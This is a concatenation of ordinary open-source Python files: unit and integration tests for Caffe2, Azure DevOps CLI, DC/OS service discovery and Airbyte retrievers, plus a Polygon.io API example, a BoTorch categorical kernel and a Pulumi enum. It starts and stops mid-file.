class TestFlatten(hu.HypothesisTestCase):
@given(X=hu.tensor(min_dim=2, max_dim=4),
**hu.gcs)
def test_flatten(self, X, gc, dc):
for axis in range(X.ndim + 1):
op = core.CreateOperator(
"Flatten",
["X"],
["Y"],
axis=axis)
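            # Worked example (illustrative): for X.shape == (2, 3, 4), axis=1
            # gives outer = 2 and inner = 12, so Y.shape == (2, 12); axis=0
            # gives outer = 1 and Y.shape == (1, 24).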
def flatten_ref(X):
shape = X.shape
outer = np.prod(shape[:axis]).astype(int)
inner = np.prod(shape[axis:]).astype(int)
return np.copy(X).reshape(outer, inner),
self.assertReferenceChecks(gc, op, [X], flatten_ref)
# Check over multiple devices
self.assertDeviceChecks(dc, op, [X], [0])
if __name__ == "__main__":
import unittest
unittest.main()
# === File: /examples/rest/universal-snapshot.py | repo: polygon-io/client-python | license: MIT ===
from typing import cast, Iterator, Union
from urllib3 import HTTPResponse
from polygon import RESTClient
from polygon.rest.models import UniversalSnapshot, SnapshotMarketType
# docs
# https://polygon.io/docs/stocks/get_v3_snapshot
# https://polygon-api-client.readthedocs.io/en/latest/Snapshot.html
# client = RESTClient("XXXXXX") # hardcoded api_key is used
client = RESTClient() # POLYGON_API_KEY environment variable is used
def print_snapshots(iterator: Union[Iterator[UniversalSnapshot], HTTPResponse]):
snapshots = [s for s in iterator]
print(f"count: {len(snapshots)}")
for item in snapshots:
print(item)
# it = client.list_universal_snapshots() # all tickers for all assets types in lexicographical order
it = client.list_universal_snapshots(
ticker_any_of=[
"AAPL",
"O:AAPL230519C00055000",
"DOES_NOT_EXIST",
"X:1INCHUSD",
"C:AEDAUD",
]
)
print_snapshots(it)
it = client.list_universal_snapshots(type="stocks", ticker_gt="A", ticker_lt="AAPL")
print_snapshots(it)
it = client.list_universal_snapshots(type="stocks", ticker_gte="AAPL", ticker_lte="ABB")
print_snapshots(it)
it = client.list_universal_snapshots(
type="options",
ticker_gte="O:AAPL230804C00050000",
ticker_lte="O:AAPL230804C00070000",
)
print_snapshots(it)
# === File: /azure-devops/azext_devops/test/team/test_team.py | repo: Azure/azure-devops-cli-extension | license: MIT (among others) ===
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import unittest
try:
# Attempt to load mock (works on Python 3.3 and above)
from unittest.mock import patch
except ImportError:
# Attempt to load mock (works on Python version below 3.3)
from mock import patch
from azext_devops.devops_sdk.v5_0.core.core_client import CoreClient
from azext_devops.dev.team.team import (create_team,
delete_team,
get_team,
get_teams,
get_team_members,
update_team)
from azext_devops.dev.common.services import clear_connection_cache
from azext_devops.test.utils.authentication import AuthenticatedTests
class TestTeamMethods(AuthenticatedTests):
_TEST_DEVOPS_ORGANIZATION = 'https://someorganization.visualstudio.com'
_TEST_PROJECT_NAME = 'sample_project'
_TEST_TEAM_NAME = 'sample_team'
_TEST_TEAM_DESCRIPTION = 'sample_team_description'
_TOP_VALUE = 10
_SKIP_VALUE = 2
def setUp(self):
self.authentication_setup()
self.get_client = patch('azext_devops.devops_sdk.connection.Connection.get_client')
self.create_team_patcher = patch('azext_devops.devops_sdk.v5_0.core.core_client.CoreClient.create_team')
self.delete_team_patcher = patch('azext_devops.devops_sdk.v5_0.core.core_client.CoreClient.delete_team')
self.get_team_patcher = patch('azext_devops.devops_sdk.v5_0.core.core_client.CoreClient.get_team')
self.get_teams_patcher = patch('azext_devops.devops_sdk.v5_0.core.core_client.CoreClient.get_teams')
self.get_team_members_patcher = patch('azext_devops.devops_sdk.v5_0.core.core_client.CoreClient.get_team_members_with_extended_properties')
self.update_team_patcher = patch('azext_devops.devops_sdk.v5_0.core.core_client.CoreClient.update_team')
#start the patcher
self.mock_get_client = self.get_client.start()
self.mock_create_team = self.create_team_patcher.start()
self.mock_delete_team = self.delete_team_patcher.start()
self.mock_get_team = self.get_team_patcher.start()
self.mock_get_teams = self.get_teams_patcher.start()
self.mock_get_team_members = self.get_team_members_patcher.start()
self.mock_update_team = self.update_team_patcher.start()
#set return values
self.mock_get_client.return_value = CoreClient(base_url=self._TEST_DEVOPS_ORGANIZATION)
#clear connection cache before running each test
clear_connection_cache()
def tearDown(self):
patch.stopall()
def test_create_team(self):
create_team(self._TEST_TEAM_NAME, self._TEST_TEAM_DESCRIPTION, self._TEST_DEVOPS_ORGANIZATION, self._TEST_PROJECT_NAME)
#assert
self.mock_create_team.assert_called_once()
create_team_param = self.mock_create_team.call_args_list[0][1]
self.assertEqual(self._TEST_PROJECT_NAME, create_team_param['project_id'], str(create_team_param))
self.assertEqual(self._TEST_TEAM_NAME, create_team_param['team'].name, str(create_team_param))
self.assertEqual(self._TEST_TEAM_DESCRIPTION, create_team_param['team'].description, str(create_team_param))
def test_delete_team(self):
delete_team(self._TEST_TEAM_NAME, self._TEST_DEVOPS_ORGANIZATION, self._TEST_PROJECT_NAME)
#assert
self.mock_delete_team.assert_called_once()
delete_team_param = self.mock_delete_team.call_args_list[0][1]
self.assertEqual(self._TEST_PROJECT_NAME, delete_team_param['project_id'], str(delete_team_param))
self.assertEqual(self._TEST_TEAM_NAME, delete_team_param['team_id'], str(delete_team_param))
def test_get_team(self):
get_team(self._TEST_TEAM_NAME, self._TEST_DEVOPS_ORGANIZATION, self._TEST_PROJECT_NAME)
#assert
self.mock_get_team.assert_called_once()
get_team_param = self.mock_get_team.call_args_list[0][1]
self.assertEqual(self._TEST_PROJECT_NAME, get_team_param['project_id'], str(get_team_param))
self.assertEqual(self._TEST_TEAM_NAME, get_team_param['team_id'], str(get_team_param))
def test_get_teams(self):
get_teams(self._TOP_VALUE, self._SKIP_VALUE, self._TEST_DEVOPS_ORGANIZATION, self._TEST_PROJECT_NAME)
#assert
self.mock_get_teams.assert_called_once()
get_teams_param = self.mock_get_teams.call_args_list[0][1]
self.assertEqual(self._TEST_PROJECT_NAME, get_teams_param['project_id'], str(get_teams_param))
self.assertEqual(10, get_teams_param['top'], str(get_teams_param))
self.assertEqual(2, get_teams_param['skip'], str(get_teams_param))
def test_get_team_members(self):
get_team_members(self._TEST_TEAM_NAME, self._TOP_VALUE, self._SKIP_VALUE, self._TEST_DEVOPS_ORGANIZATION, self._TEST_PROJECT_NAME)
#assert
self.mock_get_team_members.assert_called_once()
get_team_members_param = self.mock_get_team_members.call_args_list[0][1]
self.assertEqual(self._TEST_TEAM_NAME, get_team_members_param['team_id'], str(get_team_members_param))
self.assertEqual(self._TEST_PROJECT_NAME, get_team_members_param['project_id'], str(get_team_members_param))
self.assertEqual(10, get_team_members_param['top'], str(get_team_members_param))
self.assertEqual(2, get_team_members_param['skip'], str(get_team_members_param))
def test_update_team(self):
_NEW_TEAM_NAME = 'updated_team_name'
_NEW_TEAM_DESCRIPTION = 'update description'
update_team(self._TEST_TEAM_NAME, _NEW_TEAM_NAME, _NEW_TEAM_DESCRIPTION, self._TEST_DEVOPS_ORGANIZATION, self._TEST_PROJECT_NAME)
#assert
self.mock_update_team.assert_called_once()
update_team_param = self.mock_update_team.call_args_list[0][1]
self.assertEqual(self._TEST_PROJECT_NAME, update_team_param['project_id'], str(update_team_param))
self.assertEqual(self._TEST_TEAM_NAME, update_team_param['team_id'], str(update_team_param))
self.assertEqual(_NEW_TEAM_NAME, update_team_param['team_data'].name, str(update_team_param))
self.assertEqual(_NEW_TEAM_DESCRIPTION, update_team_param['team_data'].description, str(update_team_param))
def test_update_team_with_no_name_and_description(self):
with self.assertRaises(Exception) as exc:
response = update_team(self._TEST_TEAM_NAME, None, None, self._TEST_DEVOPS_ORGANIZATION, self._TEST_PROJECT_NAME)
self.assertEqual(str(exc.exception), r'Either name or description argument must be provided.')
#assert
self.mock_update_team.assert_not_called()
if __name__ == '__main__':
unittest.main()
# === File: /botorch/models/kernels/categorical.py | repo: pytorch/botorch | license: MIT ===
#!/usr/bin/env python3
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import torch
from gpytorch.kernels.kernel import Kernel
from torch import Tensor
class CategoricalKernel(Kernel):
r"""A Kernel for categorical features.
Computes `exp(-dist(x1, x2) / lengthscale)`, where
`dist(x1, x2)` is zero if `x1 == x2` and one if `x1 != x2`.
If the last dimension is not a batch dimension, then the
mean is considered.
Note: This kernel is NOT differentiable w.r.t. the inputs.
"""
has_lengthscale = True
def forward(
self,
x1: Tensor,
x2: Tensor,
diag: bool = False,
last_dim_is_batch: bool = False,
**kwargs,
) -> Tensor:
delta = x1.unsqueeze(-2) != x2.unsqueeze(-3)
dists = delta / self.lengthscale.unsqueeze(-2)
if last_dim_is_batch:
dists = dists.transpose(-3, -1)
else:
dists = dists.mean(-1)
res = torch.exp(-dists)
if diag:
res = torch.diagonal(res, dim1=-1, dim2=-2)
return res
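# A minimal usage sketch (illustrative, not part of the library; assumes
# gpytorch is installed): two 3-feature categorical points that differ in one
# feature have a mean Hamming-style distance of 1/3, so with a unit
# lengthscale the kernel value is exp(-1/3), approximately 0.7165.
if __name__ == "__main__":
    kernel = CategoricalKernel()
    kernel.lengthscale = 1.0
    x1 = torch.tensor([[0.0, 1.0, 2.0]])
    x2 = torch.tensor([[0.0, 1.0, 3.0]])
    with torch.no_grad():
        print(kernel.forward(x1, x2))  # tensor([[0.7165]])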
# === File: /sdk/python/pulumi_azure_native/servicenetworking/_enums.py | repo: pulumi/pulumi-azure-native | license: Apache-2.0 / BSD-3-Clause ===
|
# coding=utf-8
# *** WARNING: this file was generated by pulumi. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
from enum import Enum
__all__ = [
'AssociationType',
]
class AssociationType(str, Enum):
"""
Association Type
"""
SUBNETS = "subnets"
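# Because AssociationType subclasses both str and Enum, its members compare
# equal to their raw values, e.g. AssociationType.SUBNETS == "subnets" is True.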
# === File: /packages/dcos-integration-test/extra/test_service_discovery.py | repo: dcos/dcos | license: Apache-2.0 (among others) ===
import collections
import logging
import socket
from typing import Any, Optional
import pytest
import requests
import retrying
import test_helpers
from dcos_test_utils import marathon
from dcos_test_utils.dcos_api import DcosApiSession
__maintainer__ = 'urbanserj'
__contact__ = 'dcos-networking@mesosphere.io'
DNS_ENTRY_UPDATE_TIMEOUT = 60 # in seconds
def _service_discovery_test(dcos_api_session: DcosApiSession, docker_network_bridge: bool) -> None:
"""Service discovery integration test
This test verifies if service discovery works, by comparing marathon data
with information from mesos-dns and from containers themselves.
This is achieved by deploying an application to marathon with two instances
and the ["hostname", "UNIQUE"] constraint set. This should result in containers
being deployed to two different slaves.
The application being deployed is a simple http server written in python.
Please check test_server.py for more details.
The next step is comparing the service points provided by marathon with those
reported by mesos-dns. The tricky part here is that it may take some time for
mesos-dns to catch up with changes in the dcos_api_session.
And finally, one of the service points is verified in an as-seen-by-other-containers
fashion.
+------------------------+ +------------------------+
| Slave 1 | | Slave 2 |
| | | |
| +--------------------+ | | +--------------------+ |
+--------------+ | | | | | | | |
| | | | App instance A +------>+ App instance B | |
| TC Agent +<---->+ | | | | | |
| | | | "test server" +<------+ "reflector" | |
+--------------+ | | | | | | | |
| +--------------------+ | | +--------------------+ |
+------------------------+ +------------------------+
Code running on TC agent connects to one of the containers (let's call it
"test server") and makes a POST request with IP and PORT service point of
the second container as parameters (let's call it "reflector"). The test
server in turn connects to the other container and makes a "GET /reflect"
request. The reflector responds with the test server's IP as seen by it and
the session UUID as provided to it by Marathon. This data is then returned
to TC agent in response to POST request issued earlier.
The test succeeds if test UUIDs of the test server, reflector and the test
itself match and the IP of the test server matches the service point of that
container as reported by Marathon.
"""
# TODO(cmaloney): For non docker network bridge we should just do a mesos container.
if docker_network_bridge:
app_definition, test_uuid = test_helpers.marathon_test_app(
container_type=marathon.Container.DOCKER,
network=marathon.Network.BRIDGE,
container_port=2020,
host_port=9080)
else:
app_definition, test_uuid = test_helpers.marathon_test_app(container_type=marathon.Container.DOCKER)
app_definition['instances'] = 2
if len(dcos_api_session.slaves) < 2:
pytest.skip("Service Discovery Tests require a minimum of two agents.")
app_definition["constraints"] = [["hostname", "UNIQUE"], ]
with dcos_api_session.marathon.deploy_and_cleanup(app_definition):
service_points = dcos_api_session.marathon.get_app_service_endpoints(app_definition['id'])
# Verify if Mesos-DNS agrees with Marathon:
@retrying.retry(wait_fixed=1000,
stop_max_delay=DNS_ENTRY_UPDATE_TIMEOUT * 1000,
retry_on_result=lambda ret: ret is None,
retry_on_exception=lambda x: False)
def _pool_for_mesos_dns() -> Optional[dict]:
r = dcos_api_session.get('/mesos_dns/v1/services/_{}._tcp.marathon.mesos'.format(
app_definition['id'].lstrip('/')))
assert r.status_code == 200
r_data = r.json() # type: dict
if r_data == [{'host': '', 'port': '', 'service': '', 'ip': ''}] or len(r_data) < len(service_points):
logging.info("Waiting for Mesos-DNS to update entries")
return None
else:
logging.info("Mesos-DNS entries have been updated!")
return r_data
try:
r_data = _pool_for_mesos_dns()
except retrying.RetryError:
msg = "Mesos DNS has failed to update entries in {} seconds."
pytest.fail(msg.format(DNS_ENTRY_UPDATE_TIMEOUT))
marathon_provided_servicepoints = sorted((x.host, x.port) for x in service_points)
mesosdns_provided_servicepoints = sorted((x['ip'], int(x['port'])) for x in r_data)
assert marathon_provided_servicepoints == mesosdns_provided_servicepoints
# Verify if containers themselves confirm what Marathon says:
payload = {"reflector_ip": service_points[1].host,
"reflector_port": service_points[1].port}
r = requests.post('http://{}:{}/your_ip'.format(
service_points[0].host, service_points[0].port), payload)
if r.status_code != 200:
msg = "Test server replied with non-200 reply: '{status_code} {reason}. "
msg += "Detailed explanation of the problem: {text}"
pytest.fail(msg.format(status_code=r.status_code, reason=r.reason, text=r.text))
r_data = r.json()
assert r_data['reflector_uuid'] == test_uuid
assert r_data['test_uuid'] == test_uuid
if len(dcos_api_session.slaves) >= 2:
# When len(slaves)==1, we are connecting through docker-proxy using
# docker0 interface ip. This makes this assertion useless, so we skip
# it and rely on matching test uuid between containers only.
assert r_data['my_ip'] == service_points[0].host
# There are several combinations of Service Discovery Options we have to try:
#
# Containerizers:
# -Mesos
# -Docker
#
# Network type:
# -Bridged
# -Host
# -Overlay
# -Overlay with Port Mapping
#
# Record type:
# -Container IP
# -Agent IP
# -Auto IP
#
# More info can be found here: https://dcos.io/docs/1.8/usage/service-discovery/dns-overview/
DNSHost = 0
DNSPortMap = 1
DNSOverlay = 2
DNSAddresses = collections.namedtuple("DNSAddresses", ["container", "agent", "auto"])
MarathonAddresses = collections.namedtuple("MarathonAddresses", ["host", "container"])
def get_ipv4_addresses(hostname: Any) -> frozenset:
res = socket.getaddrinfo(hostname, 0, family=socket.AF_INET, type=socket.SOCK_STREAM)
return frozenset([sockaddr[0] for (family, type, proto, canonname, sockaddr) in res])
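# For example, get_ipv4_addresses('localhost') typically returns
# frozenset({'127.0.0.1'}); a multi-homed name yields one entry per A record.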
def get_dns_addresses_by_app_name(app_name: str) -> DNSAddresses:
container_ip_name = '{}.marathon.containerip.dcos.thisdcos.directory'.format(app_name)
agent_ip_name = '{}.marathon.agentip.dcos.thisdcos.directory'.format(app_name)
auto_ip_name = '{}.marathon.autoip.dcos.thisdcos.directory'.format(app_name)
container_ips = get_ipv4_addresses(container_ip_name)
agent_ips = get_ipv4_addresses(agent_ip_name)
auto_ips = get_ipv4_addresses(auto_ip_name)
return DNSAddresses(container_ips, agent_ips, auto_ips)
def get_marathon_addresses_by_service_points(service_points: list) -> MarathonAddresses:
marathon_host_addrs = frozenset([point.host for point in service_points])
marathon_ip_addrs = frozenset([point.ip for point in service_points])
return MarathonAddresses(marathon_host_addrs, marathon_ip_addrs)
def get_dcos_dns_records() -> Optional[dict]:
response = requests.get('http://127.0.0.1:62080/v1/records')
if response.status_code != 200:
return None
data = response.json() # type: Optional[dict]
return data
def assert_service_discovery(dcos_api_session: DcosApiSession, app_definition: Any, net_types: list) -> None:
"""
net_types: List of network types: DNSHost, DNSPortMap, or DNSOverlay
"""
with dcos_api_session.marathon.deploy_and_cleanup(app_definition):
service_points = dcos_api_session.marathon.get_app_service_endpoints(app_definition['id'])
marathon_addrs = get_marathon_addresses_by_service_points(service_points)
if DNSHost in net_types:
assert marathon_addrs.host == marathon_addrs.container
else:
assert not frozenset.intersection(marathon_addrs.host, marathon_addrs.container)
@retrying.retry(wait_fixed=1000,
stop_max_delay=DNS_ENTRY_UPDATE_TIMEOUT * 1000,
retry_on_exception=lambda x: True)
def _ensure_dns_converged() -> None:
app_name = app_definition['id']
try:
dns_addrs = get_dns_addresses_by_app_name(app_name)
except socket.gaierror as err:
records = get_dcos_dns_records()
logging.info("dcos-dns records: {}".format(records))
raise err
asserted = False
if len(net_types) == 2:
if (DNSOverlay in net_types) and (DNSPortMap in net_types):
assert marathon_addrs.host == dns_addrs.agent
assert marathon_addrs.host == dns_addrs.auto
assert marathon_addrs.container == dns_addrs.container
asserted = True
if len(net_types) == 1:
if DNSOverlay in net_types:
assert marathon_addrs.host == dns_addrs.agent
assert marathon_addrs.container == dns_addrs.auto
assert marathon_addrs.container == dns_addrs.container
asserted = True
if DNSPortMap in net_types:
assert marathon_addrs.host == dns_addrs.agent
assert marathon_addrs.host == dns_addrs.auto
assert marathon_addrs.container == dns_addrs.container
asserted = True
if DNSHost in net_types:
assert marathon_addrs.host == dns_addrs.agent
assert marathon_addrs.host == dns_addrs.auto
assert marathon_addrs.host == dns_addrs.container
asserted = True
if not asserted:
raise AssertionError("Not a valid dcos-net DNS combo")
_ensure_dns_converged()
def test_service_discovery_mesos_host(dcos_api_session: DcosApiSession) -> None:
app_definition, test_uuid = test_helpers.marathon_test_app(
container_type=marathon.Container.MESOS, healthcheck_protocol=marathon.Healthcheck.HTTP)
assert_service_discovery(dcos_api_session, app_definition, [DNSHost])
def test_service_discovery_mesos_overlay(dcos_api_session: DcosApiSession) -> None:
app_definition, test_uuid = test_helpers.marathon_test_app(
container_type=marathon.Container.MESOS,
healthcheck_protocol=marathon.Healthcheck.MESOS_HTTP,
network=marathon.Network.USER)
assert_service_discovery(dcos_api_session, app_definition, [DNSOverlay])
def test_service_discovery_docker_host(dcos_api_session: DcosApiSession) -> None:
app_definition, test_uuid = test_helpers.marathon_test_app(
container_type=marathon.Container.DOCKER,
network=marathon.Network.HOST)
assert_service_discovery(dcos_api_session, app_definition, [DNSHost])
def test_service_discovery_docker_bridge(dcos_api_session: DcosApiSession) -> None:
app_definition, test_uuid = test_helpers.marathon_test_app(
container_type=marathon.Container.DOCKER,
network=marathon.Network.BRIDGE,
container_port=2020,
host_port=9080)
assert_service_discovery(dcos_api_session, app_definition, [DNSPortMap])
def test_service_discovery_docker_overlay(dcos_api_session: DcosApiSession) -> None:
app_definition, test_uuid = test_helpers.marathon_test_app(
container_type=marathon.Container.DOCKER,
network=marathon.Network.USER)
assert_service_discovery(dcos_api_session, app_definition, [DNSOverlay])
def test_service_discovery_docker_overlay_port_mapping(dcos_api_session: DcosApiSession) -> None:
app_definition, test_uuid = test_helpers.marathon_test_app(
container_type=marathon.Container.DOCKER,
healthcheck_protocol=marathon.Healthcheck.MESOS_HTTP,
network=marathon.Network.USER,
host_port=9080)
assert_service_discovery(dcos_api_session, app_definition, [DNSOverlay, DNSPortMap])
def test_service_discovery_docker_bridged_network(dcos_api_session: DcosApiSession) -> None:
return _service_discovery_test(dcos_api_session, docker_network_bridge=True)
def test_service_discovery_docker_host_network(dcos_api_session: DcosApiSession) -> None:
return _service_discovery_test(dcos_api_session, docker_network_bridge=False)
def test_if_search_is_working(dcos_api_session: DcosApiSession) -> None:
"""Test if custom set search is working.
Verifies that a marathon app running on the dcos_api_session can resolve names using
searching the "search" the dcos_api_session was launched with (if any). It also tests
that absolute searches still work, and search + things that aren't
sub-domains fails properly.
The application being deployed is a simple http server written in python.
Please check test_server.py for more details.
"""
# Launch the app
app_definition, test_uuid = test_helpers.marathon_test_app()
with dcos_api_session.marathon.deploy_and_cleanup(app_definition):
service_points = dcos_api_session.marathon.get_app_service_endpoints(app_definition['id'])
# Get the status
r = requests.get('http://{}:{}/dns_search'.format(service_points[0].host,
service_points[0].port))
if r.status_code != 200:
msg = "Test server replied with non-200 reply: '{0} {1}. "
msg += "Detailed explanation of the problem: {2}"
pytest.fail(msg.format(r.status_code, r.reason, r.text))
r_data = r.json()
# Make sure we hit the app we expected
assert r_data['test_uuid'] == test_uuid
expected_error = {'error': '[Errno -2] Name or service not known'}
# Check that result matches expectations for this dcos_api_session
expanded_config = test_helpers.get_expanded_config()
if expanded_config['dns_search']:
assert r_data['search_hit_leader'] in dcos_api_session.masters
assert r_data['always_hit_leader'] in dcos_api_session.masters
assert r_data['always_miss'] == expected_error
else: # No dns search, search hit should miss.
assert r_data['search_hit_leader'] == expected_error
assert r_data['always_hit_leader'] in dcos_api_session.masters
assert r_data['always_miss'] == expected_error
# === File: /dts/airbyte/airbyte-cdk/python/unit_tests/sources/declarative/retrievers/test_simple_retriever.py | repo: alldatacenter/alldata | license: MIT (among others) ===
#
# Copyright (c) 2023 Airbyte, Inc., all rights reserved.
#
from unittest.mock import MagicMock, patch
import airbyte_cdk.sources.declarative.requesters.error_handlers.response_status as response_status
import pytest
import requests
from airbyte_cdk.models import AirbyteLogMessage, AirbyteMessage, Level, SyncMode, Type
from airbyte_cdk.sources.declarative.exceptions import ReadException
from airbyte_cdk.sources.declarative.incremental import DatetimeBasedCursor
from airbyte_cdk.sources.declarative.requesters.error_handlers.response_action import ResponseAction
from airbyte_cdk.sources.declarative.requesters.error_handlers.response_status import ResponseStatus
from airbyte_cdk.sources.declarative.requesters.request_option import RequestOptionType
from airbyte_cdk.sources.declarative.requesters.requester import HttpMethod
from airbyte_cdk.sources.declarative.retrievers.simple_retriever import (
SimpleRetriever,
SimpleRetrieverTestReadDecorator,
_prepared_request_to_airbyte_message,
_response_to_airbyte_message,
)
from airbyte_cdk.sources.streams.http.auth import NoAuth
from airbyte_cdk.sources.streams.http.http import HttpStream
primary_key = "pk"
records = [{"id": 1}, {"id": 2}]
request_response_logs = [
AirbyteLogMessage(level=Level.INFO, message="request:{}"),
AirbyteLogMessage(level=Level.INFO, message="response{}"),
]
config = {}
@patch.object(HttpStream, "_read_pages", return_value=[])
def test_simple_retriever_full(mock_http_stream):
requester = MagicMock()
request_params = {"param": "value"}
requester.get_request_params.return_value = request_params
paginator = MagicMock()
next_page_token = {"cursor": "cursor_value"}
paginator.path.return_value = None
paginator.next_page_token.return_value = next_page_token
record_selector = MagicMock()
record_selector.select_records.return_value = records
stream_slicer = MagicMock()
stream_slices = [{"date": "2022-01-01"}, {"date": "2022-01-02"}]
stream_slicer.stream_slices.return_value = stream_slices
response = requests.Response()
underlying_state = {"date": "2021-01-01"}
stream_slicer.get_stream_state.return_value = underlying_state
requester.get_authenticator.return_value = NoAuth()
url_base = "https://airbyte.io"
requester.get_url_base.return_value = url_base
path = "/v1"
requester.get_path.return_value = path
http_method = HttpMethod.GET
requester.get_method.return_value = http_method
backoff_time = 60
should_retry = ResponseStatus.retry(backoff_time)
requester.interpret_response_status.return_value = should_retry
request_body_json = {"body": "json"}
requester.request_body_json.return_value = request_body_json
request_body_data = {"body": "data"}
requester.get_request_body_data.return_value = request_body_data
request_body_json = {"body": "json"}
requester.get_request_body_json.return_value = request_body_json
request_kwargs = {"kwarg": "value"}
requester.request_kwargs.return_value = request_kwargs
cache_filename = "cache"
requester.cache_filename = cache_filename
use_cache = True
requester.use_cache = use_cache
retriever = SimpleRetriever(
name="stream_name",
primary_key=primary_key,
requester=requester,
paginator=paginator,
record_selector=record_selector,
stream_slicer=stream_slicer,
parameters={},
config={},
)
assert retriever.primary_key == primary_key
assert retriever.url_base == url_base
assert retriever.path() == path
assert retriever.state == underlying_state
assert retriever.next_page_token(response) == next_page_token
assert retriever.request_params(None, None, None) == request_params
assert retriever.stream_slices(sync_mode=SyncMode.incremental) == stream_slices
assert retriever._last_response is None
assert retriever._last_records is None
assert retriever.parse_response(response, stream_state={}) == records
assert retriever._last_response == response
assert retriever._last_records == records
assert retriever.http_method == "GET"
assert not retriever.raise_on_http_errors
assert retriever.should_retry(requests.Response())
assert retriever.backoff_time(requests.Response()) == backoff_time
assert retriever.request_body_json(None, None, None) == request_body_json
assert retriever.request_kwargs(None, None, None) == request_kwargs
assert retriever.cache_filename == cache_filename
assert retriever.use_cache == use_cache
[r for r in retriever.read_records(SyncMode.full_refresh)]
paginator.reset.assert_called()
@patch.object(HttpStream, "_read_pages", return_value=[*request_response_logs, *records])
def test_simple_retriever_with_request_response_logs(mock_http_stream):
requester = MagicMock()
paginator = MagicMock()
record_selector = MagicMock()
stream_slicer = DatetimeBasedCursor(
start_datetime="",
end_datetime="",
step="P1D",
cursor_field="id",
datetime_format="",
cursor_granularity="P1D",
config={},
parameters={},
)
retriever = SimpleRetriever(
name="stream_name",
primary_key=primary_key,
requester=requester,
paginator=paginator,
record_selector=record_selector,
stream_slicer=stream_slicer,
parameters={},
config={},
)
actual_messages = [r for r in retriever.read_records(SyncMode.full_refresh)]
paginator.reset.assert_called()
assert isinstance(actual_messages[0], AirbyteLogMessage)
assert isinstance(actual_messages[1], AirbyteLogMessage)
assert actual_messages[2] == records[0]
assert actual_messages[3] == records[1]
@patch.object(HttpStream, "_read_pages", return_value=[])
def test_simple_retriever_with_request_response_log_last_records(mock_http_stream):
requester = MagicMock()
paginator = MagicMock()
record_selector = MagicMock()
record_selector.select_records.return_value = request_response_logs
response = requests.Response()
stream_slicer = DatetimeBasedCursor(
start_datetime="",
end_datetime="",
step="P1D",
cursor_field="id",
datetime_format="",
cursor_granularity="P1D",
config={},
parameters={},
)
retriever = SimpleRetriever(
name="stream_name",
primary_key=primary_key,
requester=requester,
paginator=paginator,
record_selector=record_selector,
stream_slicer=stream_slicer,
parameters={},
config={},
)
assert retriever._last_response is None
assert retriever._last_records is None
assert retriever.parse_response(response, stream_state={}) == request_response_logs
assert retriever._last_response == response
assert retriever._last_records == request_response_logs
[r for r in retriever.read_records(SyncMode.full_refresh)]
paginator.reset.assert_called()
@pytest.mark.parametrize(
"test_name, requester_response, expected_should_retry, expected_backoff_time",
[
("test_should_retry_fail", response_status.FAIL, False, None),
("test_should_retry_none_backoff", ResponseStatus.retry(None), True, None),
("test_should_retry_custom_backoff", ResponseStatus.retry(60), True, 60),
],
)
def test_should_retry(test_name, requester_response, expected_should_retry, expected_backoff_time):
requester = MagicMock(use_cache=False)
retriever = SimpleRetriever(
name="stream_name", primary_key=primary_key, requester=requester, record_selector=MagicMock(), parameters={}, config={}
)
requester.interpret_response_status.return_value = requester_response
assert retriever.should_retry(requests.Response()) == expected_should_retry
if requester_response.action == ResponseAction.RETRY:
assert retriever.backoff_time(requests.Response()) == expected_backoff_time
@pytest.mark.parametrize(
"test_name, status_code, response_status, len_expected_records, expected_error",
[
(
"test_parse_response_fails_if_should_retry_is_fail",
404,
response_status.FAIL,
None,
ReadException("Request None failed with response <Response [404]>"),
),
("test_parse_response_succeeds_if_should_retry_is_ok", 200, response_status.SUCCESS, 1, None),
("test_parse_response_succeeds_if_should_retry_is_ignore", 404, response_status.IGNORE, 0, None),
(
"test_parse_response_fails_with_custom_error_message",
404,
ResponseStatus(response_action=ResponseAction.FAIL, error_message="Custom error message override"),
None,
ReadException("Custom error message override"),
),
],
)
def test_parse_response(test_name, status_code, response_status, len_expected_records, expected_error):
requester = MagicMock(use_cache=False)
record_selector = MagicMock()
record_selector.select_records.return_value = [{"id": 100}]
retriever = SimpleRetriever(
name="stream_name", primary_key=primary_key, requester=requester, record_selector=record_selector, parameters={}, config={}
)
response = requests.Response()
response.request = requests.Request()
response.status_code = status_code
requester.interpret_response_status.return_value = response_status
if len_expected_records is None:
try:
retriever.parse_response(response, stream_state={})
assert False
except ReadException as actual_exception:
assert type(expected_error) is type(actual_exception)
else:
records = retriever.parse_response(response, stream_state={})
assert len(records) == len_expected_records
@pytest.mark.parametrize(
"test_name, response_action, retry_in, expected_backoff_time",
[
("test_backoff_retriable_request", ResponseAction.RETRY, 10, 10),
("test_backoff_fail_request", ResponseAction.FAIL, 10, None),
("test_backoff_ignore_request", ResponseAction.IGNORE, 10, None),
("test_backoff_success_request", ResponseAction.IGNORE, 10, None),
],
)
def test_backoff_time(test_name, response_action, retry_in, expected_backoff_time):
requester = MagicMock(use_cache=False)
record_selector = MagicMock()
record_selector.select_records.return_value = [{"id": 100}]
response = requests.Response()
retriever = SimpleRetriever(
name="stream_name", primary_key=primary_key, requester=requester, record_selector=record_selector, parameters={}, config={}
)
if expected_backoff_time:
requester.interpret_response_status.return_value = ResponseStatus(response_action, retry_in)
actual_backoff_time = retriever.backoff_time(response)
assert expected_backoff_time == actual_backoff_time
else:
try:
retriever.backoff_time(response)
assert False
except ValueError:
pass
@pytest.mark.parametrize(
"test_name, paginator_mapping, stream_slicer_mapping, expected_mapping",
[
("test_only_base_headers", {}, {}, {"key": "value"}),
("test_header_from_pagination", {"offset": 1000}, {}, {"key": "value", "offset": 1000}),
("test_header_from_stream_slicer", {}, {"slice": "slice_value"}, {"key": "value", "slice": "slice_value"}),
("test_duplicate_header_slicer", {}, {"key": "slice_value"}, None),
("test_duplicate_header_slicer_paginator", {"k": "v"}, {"k": "slice_value"}, None),
("test_duplicate_header_paginator", {"key": 1000}, {}, None),
],
)
def test_get_request_options_from_pagination(test_name, paginator_mapping, stream_slicer_mapping, expected_mapping):
# This test does not test request headers because they must be strings
paginator = MagicMock()
paginator.get_request_params.return_value = paginator_mapping
paginator.get_request_body_data.return_value = paginator_mapping
paginator.get_request_body_json.return_value = paginator_mapping
stream_slicer = MagicMock()
stream_slicer.get_request_params.return_value = stream_slicer_mapping
stream_slicer.get_request_body_data.return_value = stream_slicer_mapping
stream_slicer.get_request_body_json.return_value = stream_slicer_mapping
